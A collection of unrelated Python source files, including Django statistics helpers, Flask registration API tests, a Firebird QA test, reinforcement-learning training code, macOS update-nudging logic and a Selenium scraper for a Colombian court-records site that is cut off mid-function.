import datetime
from weunion.models import User, Town
from news.models import News
from petitions.models import Petitions
from defects.models import Issues
from polls.models import Poll
def city_stats():
users = []
for town in Town.objects.all():
count = User.objects.filter(towns=town).count()
defects = Issues.objects.filter(town_ref=town, parent_task_ref=None).count()
petitions = Petitions.objects.filter(town=town).count()
news = News.objects.filter(town=town).count()
polls = Poll.objects.filter(town=town).count()
if count > 4 or defects > 0 or petitions > 0 or news > 0 or polls > 0:
users.append((town.name, count, petitions, defects, news, polls))
return users
# The module below contains functions used to generate statistics.
# Each function takes the same pair of parameters, date_from - date_to, placed
# in reverse order for convenience of use. date_to defaults to None and is
# resolved at call time (a datetime.datetime.now() default would be evaluated
# only once, at import).
def users_registered(date_to=None, date_from=datetime.datetime.min):
    date_to = date_to or datetime.datetime.now()
    return User.objects.filter(date_joined__gte=date_from, date_joined__lte=date_to).count()
def news_published(date_to=None, date_from=datetime.datetime.min):
    date_to = date_to or datetime.datetime.now()
    return News.objects.filter(datetime_publish__gte=date_from, datetime_publish__lte=date_to).count()
def petitions_created(date_to=None, date_from=datetime.datetime.min):
    date_to = date_to or datetime.datetime.now()
    return Petitions.objects.filter(create_date__gte=date_from, create_date__lte=date_to).count()
def defects_created(date_to=None, date_from=datetime.datetime.min):
    date_to = date_to or datetime.datetime.now()
    return Issues.objects.filter(created__gte=date_from, created__lte=date_to, parent_task_ref=None).count()
def polls_created(date_to=None, date_from=datetime.datetime.min):
    date_to = date_to or datetime.datetime.now()
    return Poll.objects.filter(date_start__gte=date_from, date_start__lte=date_to).count()
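# A minimal usage sketch (an illustration, assuming a configured Django
# settings module): count the last week's activity with an explicit window.
if __name__ == '__main__':
    week_ago = datetime.datetime.now() - datetime.timedelta(days=7)
    print('users registered:', users_registered(date_from=week_ago))
    print('news published:', news_published(date_from=week_ago))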
|
# -*- coding: utf-8 -*-
"""
tests.test_api
~~~~~~~~~~~~~~
Test API
:author: Dave Caraway
:copyright: © 2014-2015, Fog Mine, LLC
templated from https://github.com/ryanolson/cookiecutter-webapp
"""
import pytest
from flask import url_for
from flask_jwt import generate_token
from tests.factories import UserFactory, RoleFactory, InviteFactory
from app.models.users import User
from bs4 import BeautifulSoup
import re
import sure
class TestRegistration:
"""Test user registration via the API"""
def test_register_data_invalid_email_generates_400(self, testapi, role, invite):
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"notareal email address", "password":"supersecret", "token":invite.token}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data, expect_errors=True)
resp.status_code.should.equal(400)
resp.json['status'].should.equal(400)
resp.json['message'].should.contain("is not a 'email'")
def test_syntactically_valid_invite_is_required_to_register(self, testapi, role, invite):
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"someone@somewhere.com", "password":"supersecret", "token":"badto"}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data, expect_errors=True)
resp.status_code.should.equal(400)
resp.json['status'].should.equal(400)
resp.json['message'].should.contain("too short")
def test_invite_is_not_required_to_register(self, testapi, role):
"""
SEE #93725066 User was unable to register after we removed the invite-only status
:return:
"""
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"someone@somewhere.com", "password":"supersecret"}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data)
resp.status_code.should.equal(201)
def test_valid_invite_is_required_to_register(self, testapi, role, invite):
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"someone@somewhere.com", "password":"supersecret", "token":"abadtokenhere"}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data, expect_errors=True)
resp.status_code.should.equal(409)
resp.json['status'].should.equal(409)
resp.json['message'].should.contain("Invite is invalid")
def test_register_user(self, apidb, testapi, role, invite):
data = {"firstName":"myFirstName", "lastName":"myLastName", "email":"agent@secret.com", "password":"supersecret", "token":invite.token}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data)
#test register user creates user but confirmed_at is not set
u = User.query.filter_by(email=data['email']).first()
from flask_security.utils import verify_and_update_password
verify_and_update_password(user=u, password='supersecret').should_not.be.none
u.confirmed_at.should.be.none
return resp
def test_register_user_assigns_user_role(self, apidb, testapi, role, invite):
resp = self.test_register_user(apidb, testapi, role, invite=invite)
resp.json['user']['roles'].should.have.length_of(1)
u = User.first(email='agent@secret.com')
u.roles.should.have.length_of(1)
u.roles.should.contain(role)
def test_register_user_returns_201(self, apidb, testapi, role, invite):
resp = self.test_register_user(apidb, testapi, role, invite=invite)
resp.status_code.should.equal(201)
resp.json['status'].should.equal(201)
resp.json['message'].should.contain("A confirmation email has been sent to agent@secret.com")
resp.json['user'].should_not.be.none
resp.json['user']['token'].should_not.be.none
def test_register_user_sends_confirmation_email(self, apidb, testapi, mail, role, invite):
with mail.record_messages() as outbox:
self.test_register_user(apidb, testapi, role, invite)
outbox.should.have.length_of(1)
m = outbox[0]
return m
def test_register_user_records_login(self, apidb, testapi, role, invite):
#SEE issue 90454516
self.test_register_user(apidb, testapi, role, invite)
#test register user creates user but confirmed_at is not set
u = User.query.filter_by(email='agent@secret.com').first()
u.current_login_at.should_not.be.none
u.current_login_ip.should_not.be.none
u.last_login_at.should_not.be.none
u.last_login_ip.should_not.be.none
def test_registered_but_unconfirmed_user_may_login(self, apidb, testapi, role, invite):
self.test_register_user(apidb, testapi, role, invite)
u = User.query.filter_by(email='agent@secret.com').first()
resp = testapi.post_json(url_for('jwt'), dict(username=u.email, password='supersecret'))
resp.status_code.should.equal(200)
def test_user_may_not_register_twice(self, apidb, testapi, user, invite):
data = {'email': user.email, 'password':'doesnt_matter', 'firstName':'joe', 'lastName':'bob', "token":invite.token}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), data, expect_errors=True)
resp.status_code.should.equal(409)
resp.json['status'].should.equal(409)
resp.json['message'].should.contain('email already exists')
def test_invite_may_be_used_only_once(self, apidb, testapi, role, invite):
self.test_register_user(apidb=apidb, testapi=testapi, role=role, invite=invite)
# This second registration attempt will try to use the same token. It should NOT be able to succeed.
userData2 = {'email': "user2@me.com", 'password':'doesnt_matter', 'firstName':'jimminey', 'lastName':'jimminy', "token":invite.token}
resp = testapi.post_json(url_for('v1.AuthView:register_user'), userData2, expect_errors=True)
resp.status_code.should.equal(409)
resp.json['status'].should.equal(409)
resp.json['message'].should.contain('Invite already used')
def test_confirm_user(self, apidb, testapi, mail, role, invite):
m = self.test_register_user_sends_confirmation_email(apidb, testapi, mail, role, invite=invite)
u = User.find(email='agent@secret.com').first()
u.confirmed_at.should.be.none
token = self.get_confirmation_token_from_email(m)
href = url_for('v1.AuthView:confirm_email')
resp = testapi.post_json(href, dict(token=token))
# confirmed status should be set
u.confirmed_at.should_not.be.none
# confirmed user should receive a login credential set
resp.status_code.should.equal(200)
resp.json.get('user').should_not.be.none
def test_confirm_user_with_bad_token_409(self, apidb, testapi, mail, role, invite):
m = self.test_register_user_sends_confirmation_email(apidb, testapi, mail, role, invite=invite)
href = url_for('v1.AuthView:confirm_email')
resp = testapi.post_json(href, dict(token='notarealtoken'), expect_errors=True)
resp.status_code.should.equal(409)
resp.json['status'].should.equal(409)
resp.json['message'].should.contain('Invalid')
def test_user_may_not_confirm_twice(self, apidb, testapi, mail, role, invite):
m = self.test_register_user_sends_confirmation_email(apidb, testapi, mail, role, invite=invite)
token = self.get_confirmation_token_from_email(m)
href = url_for('v1.AuthView:confirm_email')
testapi.post_json(href, dict(token=token))
resp2 = testapi.post_json(href, dict(token=token), expect_errors=True)
resp2.status_code.should.equal(409)
    def test_user_may_not_use_expired_token(self, apidb, testapi, mail):
        # Token generated via itsdangerous.URLSafeTimedSerializer; kept for
        # reference while the request below uses a plainly invalid token
        old_token = {'secret':'super secret', 'salt':'salty', 'token':'ImZvbyI.B4ovjQ.UAh0LfwlwReM9_FTughkAHpvxkQ'}
        resp = testapi.post_json(url_for('v1.AuthView:confirm_email'), dict(token='notarealtoken'), expect_errors=True)
        resp.status_code.should.equal(409)
def get_confirmation_token_from_email(self, message):
"""Retrieves the confirmation link from the message"""
        soup = BeautifulSoup(message.html, 'html.parser')
return re.search('token=(.*)', soup.a['href']).group(1)
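# A minimal sketch of the markup get_confirmation_token_from_email expects: an
# HTML body whose first <a> carries the token as a query parameter (the URL
# below is hypothetical):
#
#     html = '<a href="https://example.com/confirm?token=abc123">Confirm</a>'
#     soup = BeautifulSoup(html, 'html.parser')
#     re.search('token=(.*)', soup.a['href']).group(1)  # -> 'abc123'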
|
#coding:utf-8
#
# id: bugs.core_0198
# title: wrong order by in table join storedproc
# description:
# tracker_id: CORE-0198
# min_versions: ['2.5.0']
# versions: 2.5
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 2.5
# resources: None
substitutions_1 = []
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
recreate table my_table
(
k varchar(10) not null,
d1 integer,
d2 integer,
v1 varchar(10),
primary key (k)
);
set term ^;
create or alter procedure select_me returns(
data varchar(10)
) as
begin
data = 'one';
suspend;
data = 'two';
suspend;
data = 'three';
suspend;
end
^
set term ;^
commit;
insert into my_table values ('one', 1, 99, 'zz');
insert into my_table values ('two', 2, 98, 'yy');
insert into my_table values ('three', 3, 97, 'xx');
commit;
set list on;
select *
from my_table t join select_me p on (t.k = p.data)
order by t.d1
;
commit;
create index i1 on my_table(d1);
commit;
select *
from my_table t join select_me p on (t.k = p.data)
order by t.d1
;
commit;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
K one
D1 1
D2 99
V1 zz
DATA one
K two
D1 2
D2 98
V1 yy
DATA two
K three
D1 3
D2 97
V1 xx
DATA three
K one
D1 1
D2 99
V1 zz
DATA one
K two
D1 2
D2 98
V1 yy
DATA two
K three
D1 3
D2 97
V1 xx
DATA three
"""
@pytest.mark.version('>=2.5')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
|
#print the following lines
print "Mary had a little lamb."
print "Its fleece was white as %s." % 'snow'
print "And Everywhere that Mary went."
#print 10 times the '.' character
print "." * 10 #What'd that do?
#Variable assignment to each letter of the word Cheeseburger
end1 = "C"
end2 = "h"
end3 = "e"
end4 = "e"
end5 = "s"
end6 = "e"
end7 = "B"
end8 = "u"
end9 = "r"
end10 = "g"
end11 = "e"
end12 = "r"
# Watch the comma at the end of the next print. Try removing it and see what happens
# Print the end<x> variables on one line or on two separate lines depending on the ','
print end1 + end2 + end3 + end4 + end5 + end6,
print end7 + end8 + end9 + end10 + end11 + end12
|
from ...models.user import User
from ...models.role import Role
from werkzeug.security import generate_password_hash
import random
import string
import smtplib
from email.message import EmailMessage
from os import getenv
def user_found(email: str = None, password: str = None) -> bool:
    # return an explicit bool so callers never receive None
    return bool(User().check_credentials(email, password))
def hash_password(password: str = None) -> str:
hashed_password = generate_password_hash(password, 'sha256')
return hashed_password
def get_role_id(role: str = None) -> int:
role_id = Role.get_id(role)
return role_id
def random_characters():
char_count = 10
random_char = ''.join(random.choices(string.ascii_uppercase + string.digits, k = char_count))
return random_char
def gmail_code(code: str = None, receiver: str = None) -> None:
    msg = EmailMessage()
    msg['Subject'] = 'FODO Reset Code'
    msg['From'] = 'Food Donation'
    msg['To'] = receiver
    msg.set_content(f'Your reset code: {code}')
    # Establish the connection and close it when done
    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:
        server.login(getenv('FODO_GMAIL_ADDRESS'), getenv('FODO_GMAIL_PASSWORD'))
        # Send mail
        server.send_message(msg)
    return None
def check_email_registration(email):
    return bool(User().check_email_existence(email))
def check_org_registration(org_name):
    if org_name == '':
        return False
    return bool(User().check_org_existence(org_name))
def check_contact_registration(number):
    return bool(User().check_contact_existence(number))
def save_new_password(email, password):
hashed_password = hash_password(password)
User().save_new_password(email,hashed_password)
return
def get_role(email: str) -> str:
role = User().get_role(email)
return role
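# A minimal sketch of the reset-code flow these helpers support (assuming the
# FODO_GMAIL_ADDRESS / FODO_GMAIL_PASSWORD environment variables are set; the
# address below is a stand-in):
#
#     code = random_characters()
#     gmail_code(code=code, receiver='user@example.com')
#     # ...once the user echoes the code back...
#     save_new_password('user@example.com', 'new-password')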
|
#! python3
import re
from math import sqrt
from typing import Union, Optional
import language_check
import constants
lt: language_check.LanguageTool = language_check.LanguageTool('en-US')
def grammar_check(text: str) -> Union[str, bool]:
text = language_check.correct(text, lt.check(text))
if len(lt.check(text)) > 0:
return False
return text
def get_weight(tweet) -> int:
precise_weight = int((tweet.retweet_count*5 + tweet.favorite_count)/sqrt(tweet.author.followers_count))
    # limit the weight of a single tweet to 20 to avoid being
    # 'overrun' by one viral tweet
    limited_weight = min(precise_weight, 20)
    return limited_weight
def get_viable_text(tweet) -> Optional[str]:
string = get_plain_text(tweet.text)
if (not string) or (re.search('[a-zA-Z]', string) is None) or (tweet.author in constants.IGNORED_USERS):
return None
return string
def get_plain_text(raw_tweet_text: str) -> Union[str, bool]:
    raw_tweet_text = re.sub(r'https?://t\.co/\S+', '', raw_tweet_text)
    # remove URLs. Twitter's URL shortener makes every link look like
    # "https://t.co/Amn4oTgxkD" (older tweets may use plain http, which
    # the https? pattern also covers)
    raw_tweet_text = re.sub(r'.?@\w+[: ]', '', raw_tweet_text)
    # remove mentions. Mentions look like "@_jfde" or "@_jfde:"
    raw_tweet_text = re.sub(r'^RT', '', raw_tweet_text)
    # remove retweet identifiers. Retweets in plain text look like: "RT @_jfde: Original tweet text"
    raw_tweet_text = re.sub(r'#\w+', '', raw_tweet_text)
    # remove hashtags entirely. Example: "I really like #python!" becomes "I really like !"
    raw_tweet_text = re.sub(r'[\n ]+', ' ', raw_tweet_text)
    # collapse newlines and repeated whitespace into single spaces
    raw_tweet_text = raw_tweet_text.strip()  # remove whitespace at the beginning or end of a tweet
    return grammar_check(raw_tweet_text)  # improve the grammar of these lazy twitter users
def make_tweet_text(raw_tweet_text: str) -> Union[str, bool]:
tweet = get_plain_text(raw_tweet_text)
if not tweet:
return False
if not tweet[-1] in {'.', '!', '?', ','}:
tweet += '.'
if 0 < len(tweet) <= 140:
return tweet
else:
return False
if __name__ == '__main__':
# run tests
print(get_plain_text(r"@123 https://t.co/f3g Definitely important infomration! @_12jfde \n "))
|
import gym  # needed for gym.make() below
import numpy as np
import math
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import torch.nn.functional as F
import pickle
from lib.model import *
from lib.zfilter import ZFilter
from lib.util import *
from lib.ppo import ppo_step
from lib.data import *
def gail_learn(args):
'''env params'''
env_name, batch_size, vv, mm, als, ex_path, fig_path = args.env_id, args.batch_size, args.vv,args.mm, args.als, args.ex_path, args.fig_path
'''ppo params'''
ppo_eps, ppo_epoches = args.ppo_eps, args.ppo_epoches
'''data '''
data_n_steps, max_genert_num, gamma, lambd = args.data_n_steps, args.max_genert_num, args.gamma, args.lambd
'''set up '''
env = gym.make(env_name)
env.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
device = torch.device("cuda" if args.use_cuda and torch.cuda.is_available() else "cpu")
#zflt = ZFilter((env.observation_space.shape[0],), clip=5)
dtype = torch.float64
torch.set_default_dtype(dtype)
'''model and optim'''
    policy_model = ModelActor(env.observation_space.shape[0], env.action_space.shape[0]).to(device)
    print(env.observation_space.shape[0])
    # the original if/else built the same critic in both branches
    critic_model = ModelCritic(env.observation_space.shape[0]).to(device)
opt_policy = optim.Adam(policy_model.parameters(), lr = args.lr_policy)
opt_critic = optim.Adam(critic_model.parameters(), lr = args.lr_critic)
    '''
    args.action == '0' : standard GAIL
    args.action == '1' : GAIL without expert action
    args.action == '2' : GAIL without expert action, but input agent action
    args.action == '3' : GAIL on consecutive state pairs (s_t, s_t+1)
    '''
if args.action == '1':
D = ModelDCritic(env.observation_space.shape[0], 0).to(device)
elif args.action == '3':
t = env.observation_space.shape[0]
D = ModelDCritic(t, t).to(device)
else:
D = ModelDCritic(env.observation_space.shape[0], env.action_space.shape[0]).to(device)
opt_D = optim.Adam(D.parameters(), lr = args.lr_critic)
if args.action == '2':
pass
zflt = pickle.load(open(ex_path+env_name+'_expert'+vv+'.p', 'rb'))
gene = generate2(policy_model, env, env_name, als, device, data_n_steps, ex_path, fig_path, vv, max_genert_num, zflt, critic_model, args.action, args.seed, expert_reward, D, mm)
d_criterion = nn.BCELoss()
experts = np.load(ex_path+env_name+'_ppo'+vv+'_state_action.npy')
if args.action == '3':
experts = np.hstack((experts[:-1, :t], experts[1:, :t]))
print(experts.shape)
ex_states_actions_ = experts#[np.random.randint(0,experts.shape[0], ),:]
E_loss, G_loss, V_loss, P_loss = [], [], [], []
L_idx = 0
for trj in gene:
_logstd = policy_model.logstd.data.cpu().numpy()
print('policy model sigma:' )
print(_logstd)
L_idx += 1
states, actions, rewards, dones, values = trj['states'], trj['actions'], trj['rewards'], trj['dones'], trj['values']
print(actions[-1])
print(trj['mean'])
print(trj['std'])
#if args.action == '3':
# states = np.stack((states[:-1], states[1:]), axis=1)
states = torch.from_numpy(np.stack(states)).to(dtype).to(device)
actions = torch.from_numpy(np.stack(actions)).to(dtype).to(device)
rewards = torch.from_numpy(np.stack(rewards)).to(dtype).to(device)
dones = torch.from_numpy(np.stack(dones)).to(dtype).to(device)
values = torch.from_numpy(np.stack(values)).to(dtype).to(device).unsqueeze(-1)
with torch.no_grad():
#values = critic_model(states)
#values = expert_reward(D, states, actions)
old_logprob = policy_model.get_log_prob(states, actions)
adv, ref = cal_adv_ref(rewards, dones, values, gamma, lambd, device)
''' discrim optimization '''
for _ in (range(1)):
if args.action == '1' :
t = env.observation_space.shape[0]
ex_states_actions_ = experts[np.random.randint(0,experts.shape[0], 2000), :t]
ge_q_value = D(states)
elif args.action == '0':
ex_states_actions_ = experts[np.random.randint(0,experts.shape[0], 2000),:]
ge_q_value = D(torch.cat([states, actions], 1))
elif args.action == '2':
t = env.observation_space.shape[0]
rd = np.random.randint(0,experts.shape[0], 2000)
ex_states_actions_ = experts[rd, :t]
ex_states = torch.tensor(experts[rd,:t]).unsqueeze(0).to(device)
with torch.no_grad():
#ex_actions = policy_model.select_action(ex_states)[0].cpu().numpy()
ex_actions, mean_, std_ = policy_model.select_action(ex_states)
ex_actions = ex_actions[0].cpu().numpy()
ge_q_value = D(torch.cat([states, actions], 1))
ex_states_actions_ = np.hstack([ex_states_actions_, ex_actions])
elif args.action == '3':
t = env.observation_space.shape[0]
ex_states_actions_ = experts[np.random.randint(0,experts.shape[0], 2000), :]
states_ = torch.cat((states[:-1], states[1:]), 1)
ge_q_value = D(states_)
ex_states_actions = torch.from_numpy(ex_states_actions_).to(device)
## 1A train on real/expert
ex_q_value = D(ex_states_actions)
opt_D.zero_grad()
loss_ex = d_criterion(ex_q_value,torch.zeros((ex_q_value.shape[0],1), device=device))
E_loss.append(loss_ex.data.cpu().numpy())
#print(loss_ex.data.cpu().numpy())
## 1B train on fake/generate
loss_ge = d_criterion(ge_q_value, torch.ones((ge_q_value.shape[0],1), device=device))
G_loss.append(loss_ge.data.cpu().numpy())
loss_d = loss_ex + loss_ge
loss_d.backward()
opt_D.step()
opt_iter = int(math.ceil(states.shape[0]/batch_size))
P_loss_ = []
V_loss_ = []
for epoch in range(args.ppo_epoches):
perm = np.arange(states.shape[0])
#np.random.shuffle(perm)
perm = torch.LongTensor(perm).to(device)
states, actions, ref = states[perm].clone(), actions[perm].clone(), ref[perm].clone()
adv, old_logprob = adv[perm].clone(), old_logprob[perm].clone()
for i in range(opt_iter):
ind = slice(i * batch_size, min((i + 1) * batch_size, states.shape[0]))
b_states = states[ind]
b_actions = actions[ind]
b_adv = adv[ind]
b_ref = ref[ind]
b_old_logprob = old_logprob[ind]
#print(b_states.size())
#print(b_actions.size())
#print(b_ref.size())
#print(ref.size())
#qnew = expert_reward(D, b_states, b_actions, args.action)
#b_ref = qnew
v_loss, p_loss = ppo_step(policy_model, critic_model, opt_critic, opt_policy, b_states, b_actions, b_ref, b_adv, b_old_logprob)
P_loss_.append(p_loss)
V_loss_.append(v_loss)
P_loss.append(np.mean(P_loss_))
V_loss.append(np.mean(V_loss_))
signs = ''
if args.action == '1':
signs = '_no_action'
pp = fig_path+'loss_ac1/'
elif args.action == '2':
signs = '_ag_action'
pp = fig_path+'loss_ac2/'
else:
signs = ''
pp = fig_path+'loss/'
signs += '_seed'+str(args.seed)
#plot(0, E_loss, pp, env_name+als+'vv'+vv+'mm'+mm+'E_loss'+signs)
#plot(1, G_loss, pp, env_name+als+'vv'+vv+'mm'+mm+'G_loss'+signs)
#plot(2, V_loss, pp, env_name+als+'vv'+vv+'mm'+mm+'V_loss'+signs)
#plot(3, P_loss, pp, env_name+als+'vv'+vv+'mm'+mm+'P_loss'+signs)
torch.save(D.state_dict(), ex_path+env_name+'_DModel_vv'+vv+'mm'+mm+'ac'+args.action)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2019-02-25 16:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tests', '0003_IBAN'),
]
operations = [
migrations.RemoveField(
model_name='customer',
name='fb_id',
),
migrations.AddField(
model_name='customer',
name='facebook_id',
field=models.CharField(blank=True, help_text='Facebook ID used for login via Facebook.', max_length=256,
null=True, verbose_name='Facebook ID'),
),
]
|
# BSD 3-Clause License
#
# Copyright (c) 2021., Redis Labs Modules
# All rights reserved.
#
import argparse
import os
from redis_benchmarks_specification.__cli__.args import spec_cli_args
from redis_benchmarks_specification.__cli__.cli import cli_command_logic
def test_run_local_command_logic_oss_cluster():
# should error due to missing --use-tags or --use-branch
parser = argparse.ArgumentParser(
description="test",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser = spec_cli_args(parser)
args = parser.parse_args(args=[])
try:
cli_command_logic(args, "tool", "v0")
except SystemExit as e:
assert e.code == 1
    # should succeed (exit code 0) once --use-tags is provided
parser = argparse.ArgumentParser(
description="test",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser = spec_cli_args(parser)
TST_REDIS_DIR = os.getenv("TST_REDIS_DIR", None)
run_args = ["--use-tags"]
if TST_REDIS_DIR is not None:
run_args.extend(["--redis_repo", TST_REDIS_DIR])
args = parser.parse_args(
args=run_args,
)
try:
cli_command_logic(args, "tool", "v0")
except SystemExit as e:
assert e.code == 0
|
import sys
from distutils.version import LooseVersion
from os.path import exists
from datetime import datetime
# pylint: disable=no-name-in-module
from Foundation import NSDate
# pylint: enable=no-name-in-module
from .helpers import (nudgelog,
download_apple_updates,
pending_apple_updates,
update_need_restart,
update_app_path,
get_os_version_major)
from .prefs import set_app_pref, app_pref, pref
from .constants import APPLE_SUS_PREFS_PATH, APPLE_SUS_PREFS
class NudgeLogic():
    '''Class that defines the logic for nudge'''
def __init__(self, nudge_prefs):
self.nudge_prefs = nudge_prefs
self.min_major = nudge_prefs['minimum_os_version_major']
self.local_url = nudge_prefs['local_url_for_upgrade']
self.path_to_app = nudge_prefs['path_to_app']
self.update_minor = nudge_prefs['update_minor']
self.time_between_notif = nudge_prefs['time_between_notifications']
self.major_version = get_os_version_major()
self.minor_updates_required = False
self.first_seen = False
self.last_seen = False
def start(self):
'''Function that will start the nudge logic'''
if LooseVersion(self.min_major) > self.major_version:
self._check_local_url()
else:
self._check_updates_availability()
_only_background_updates(self._minor_updates_required())
self._no_nudge_all_time()
return self._update_nudgeprefs()
def _check_local_url(self):
self.first_seen = app_pref('first_seen')
self.last_seen = app_pref('last_seen')
if self.local_url:
self.path_to_app = self.local_url
else:
if not exists(self.path_to_app):
nudgelog('Update application not found! Exiting...')
sys.exit(1)
def _check_updates_availability(self):
if self.update_minor:
_download_updates()
def _minor_updates_required(self):
self.first_seen = app_pref('first_seen')
self.last_seen = app_pref('last_seen')
self.path_to_app = update_app_path()
if _all_apple_sus_prefs():
return update_need_restart()
return True
def _no_nudge_all_time(self):
if (self.time_between_notif > 0 and self.first_seen and self.last_seen):
difference = _last_seen_vs_now(self.last_seen)
            if difference.total_seconds() < self.time_between_notif:
info = 'Last seen date is within notification threshold'
nudgelog(f'{info}: {str(self.time_between_notif)} seconds')
sys.exit(0)
if not self.first_seen:
set_app_pref('first_seen', NSDate.new())
self.first_seen = app_pref('first_seen')
def _update_nudgeprefs(self):
self.nudge_prefs['minimum_os_version_major'] = self.min_major
self.nudge_prefs['local_url_for_upgrade'] = self.local_url
self.nudge_prefs['path_to_app'] = self.path_to_app
self.nudge_prefs['update_minor'] = self.update_minor
self.nudge_prefs['time_between_notifications'] = self.time_between_notif
return self.nudge_prefs
def _download_updates():
nudgelog('Checking for minor updates.')
swupd_output = download_apple_updates()
if not swupd_output:
nudgelog('Could not run softwareupdate')
# Exit 0 as we might be offline
# TODO: Check if we're offline to exit with the
# appropriate code
sys.exit(0)
if pending_apple_updates() == [] or pending_apple_updates() is None:
nudgelog('No Software updates to install')
set_app_pref('first_seen', None)
set_app_pref('last_seen', None)
sys.exit(0)
def _all_apple_sus_prefs():
sus_prefs = [pref(key, APPLE_SUS_PREFS_PATH) for key in APPLE_SUS_PREFS]
if False in sus_prefs:
return False
return True
def _only_background_updates(minor_updates_required):
if not minor_updates_required:
        nudgelog('Only updates that can be installed in the background are pending.')
set_app_pref('first_seen', None)
set_app_pref('last_seen', None)
sys.exit()
def _last_seen_vs_now(last_seen):
today = datetime.utcnow()
last_seen_strp = datetime.strptime(last_seen, '%Y-%m-%d %H:%M:%S +0000')
difference = today - last_seen_strp
return difference
if __name__ == '__main__':
print('This is a library of support tools for the Nudge Tool.')
|
import glob
import json
import logging
import os
import sys
import time
import urllib
import click
import coloredlogs
import pandas as pd
from requests.exceptions import RequestException
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import Select, WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
logger = logging.getLogger(__name__)
coloredlogs.install(
level=getattr(logging, os.getenv("logLevel", "info").upper()),
logger=logger,
fmt="[%(levelname)s] - %(asctime)s - %(processName)s|%(funcName)s(%(lineno)s): %(message)s",
)
logger.debug("Iniciando app")
# Constants
ENTRY_ENDPOINT = (
r"https://procesos.ramajudicial.gov.co/consultaprocesos/ConsultaJusticias21.aspx"
)
def remove_temp_files():
files = glob.glob("*.csv")
for file in files:
try:
os.remove(file)
except Exception as e:
logger.error("No se ha podido eliminar el archivo temporal: " + file)
logger.exception(e)
def wait_for_by_name(driver, element_name, timeout=10):
"""Espera a que un elemento con el nombre = element_name
este presente, y lo devuelve.
:param driver: driver a usar
:type driver: webdriver.WebDriver
:param element_name: atributo html ´´name´´ del elemento a buscar
:type element_name: str
:return: elemento buscado
:rtype: webelement.WebElement
"""
wait = WebDriverWait(driver, timeout)
logger.debug("Esperando por: " + element_name)
element = wait.until(ec.visibility_of_element_located((By.NAME, element_name)))
logger.debug(element_name + ": OK")
return element
def wait_for_by_xpath(driver, element_xpath, timeout=10, wait_visibility=True):
"""Espera a que un elemento con la ruta = element_xpath
este presente, y lo devuelve.
:param driver: driver a usar
:type driver: webdriver.WebDriver
:param element_xpath: expresion xpath dentro del html del driver
:type element_xpath: str
:param timeout: tiempo maximo a esperear
:type timeout: float
:param wait_visibility: esperara a que este visible o invisible
:type wait_visibility: bool
:return: elemento buscado
:rtype: webelement.WebElement
"""
wait = WebDriverWait(driver, timeout)
logger.debug("Esperando por: " + element_xpath)
if wait_visibility:
check = ec.presence_of_element_located
else:
check = ec.invisibility_of_element_located
element = wait.until(check((By.XPATH, element_xpath)))
logger.debug(element_xpath + ": OK")
return element
def wait_for_all_by_name(driver, element_name, timeout=10):
"""Espera a que un elemento con el nombre = element_name
este presente, y lo devuelve.
:param driver: driver a usar
:type driver: webdriver.WebDriver
:param element_name: atributo html ´´name´´ del elemento a buscar
:type element_name: str
:return: elemento buscado
:rtype: webelement.WebElement
"""
wait = WebDriverWait(driver, timeout)
logger.debug("Esperando por: " + element_name)
element = wait.until(ec.visibility_of_all_elements_located((By.NAME, element_name)))
logger.debug(element_name + ": OK")
return element
def get_options(driver, element_name):
element = wait_for_by_name(driver, element_name)
select_element = Select(element)
elements = {
element.text: element.get_attribute("value")
for element in select_element.options[1:]
}
return elements
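# A minimal sketch of how the helpers above compose (an illustration, assuming
# a live session on the page):
#
#     driver = webdriver.Chrome(ChromeDriverManager().install())
#     driver.get(ENTRY_ENDPOINT)
#     cities = get_options(driver, "ddlCiudad")  # {label: value}
#     Select(wait_for_by_name(driver, "ddlCiudad")).select_by_value(
#         next(iter(cities.values())))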
def handle_error(driver):
"""Busca el boton de ´´Cerrar´´ y lo presiona
:param driver: driver a usar
:type driver: webdriver.WebDriver
"""
logger.debug("Presionando boton cerrar")
xpath = "//div[@id='modalError']//*/td/input[@value='Cerrar' and @type='button']"
element_error_button = driver.find_element_by_xpath(xpath)
element_error_button.click()
logger.debug("Presionando boton cerrar: ok")
def test_error(driver):
"""Checkea si esta desplegada la ventana de error y lo maneja
:param driver: driver a usar
:type driver: webdriver.WebDriver
:return: True si hay error, y False en caso contrario
:rtype: bool
"""
try:
wait = WebDriverWait(driver, 3)
xpath = "//div[@id='modalError' and @style='display: block;']"
wait.until(ec.visibility_of_element_located((By.XPATH, xpath)))
handle_error(driver)
return True
except TimeoutException:
return False
def scrap_entity(driver, entity_name, entity_code, text2search):
logger.info("Obteniendo datos para: " + entity_name.strip())
df = pd.DataFrame()
    # Select the entity
ddlEntidadEspecialidad = wait_for_by_name(driver, "ddlEntidadEspecialidad")
select_entidad = Select(ddlEntidadEspecialidad)
select_entidad.select_by_value(entity_code)
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
